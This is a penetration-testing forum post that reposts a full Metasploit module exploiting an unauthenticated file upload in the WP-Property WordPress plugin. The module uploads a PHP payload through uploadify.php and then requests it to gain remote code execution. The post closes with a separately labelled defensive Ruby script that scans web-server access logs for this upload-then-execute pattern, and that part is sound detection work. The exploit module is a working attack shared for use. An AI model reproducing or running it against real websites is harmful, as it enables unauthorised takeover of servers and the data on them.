中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: WordPress WP-Property PHP File Upload Vulnerability
Author: admin
Date: 2013-1-4 19:51

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this says or how to use it. I'm talking about msf.
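
For defenders, the request sequence in the module above (an unauthenticated POST to uploadify.php, then a GET for a new .php file in the same directory) leaves a recognisable access-log pattern. The Ruby below is an added example, not part of the original post or of the Metasploit module; the Apache combined log format, the sample log lines, the allowlist and all function names are constructed assumptions.

```ruby
# Added example: flag access-log evidence of upload-then-execute against
# WP-Property's bundled uploadify.php. Log lines below are constructed.
UPLOADIFY_DIR = %r{/wp-content/plugins/wp-property/third-party/uploadify/}
# Assumed allowlist: extend with any other PHP files your plugin copy ships.
KNOWN_PHP = %w[uploadify.php].freeze
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0
  203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71
  203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/QxZrT.php HTTP/1.1" 200 0
  198.51.100.20 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.swf HTTP/1.1" 200 12345
  198.51.100.20 - - [04/Jan/2013:19:41:11 +0800] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
LOG

# Parse one combined-format line; returns nil for lines that do not match.
def parse(line)
  m = LOG_LINE.match(line)
  return nil unless m
  { ip: m[:ip], ts: m[:ts], method: m[:method],
    path: m[:path].split('?').first, status: m[:status].to_i }
end

# Returns findings for successful uploads and for requests to PHP files in
# the uploadify directory that are not on the allowlist.
def find_upload_abuse(log_text)
  findings = []
  uploaded = Hash.new(false) # client IP => saw a 200 POST to uploadify.php
  log_text.each_line do |line|
    e = parse(line.chomp)
    next unless e && e[:path] =~ UPLOADIFY_DIR && e[:status] == 200
    file = File.basename(e[:path])
    if e[:method] == 'POST' && file == 'uploadify.php'
      uploaded[e[:ip]] = true
      findings << { ip: e[:ip], ts: e[:ts], kind: :upload, path: e[:path] }
    elsif file =~ /\.(php\d?|phtml)\z/i && !KNOWN_PHP.include?(file)
      kind = uploaded[e[:ip]] ? :upload_then_exec : :unexpected_php
      findings << { ip: e[:ip], ts: e[:ts], kind: kind, path: e[:path] }
    end
  end
  findings
end

if $PROGRAM_NAME == __FILE__
  find_upload_abuse(SAMPLE_LOG).each { |f| puts f.values_at(:ts, :ip, :kind, :path).join(' ') }
end
```

Because the module's payload is generated with :unlink_self, the uploaded file may no longer exist on disk when responders look, so the access log can be the only remaining trace.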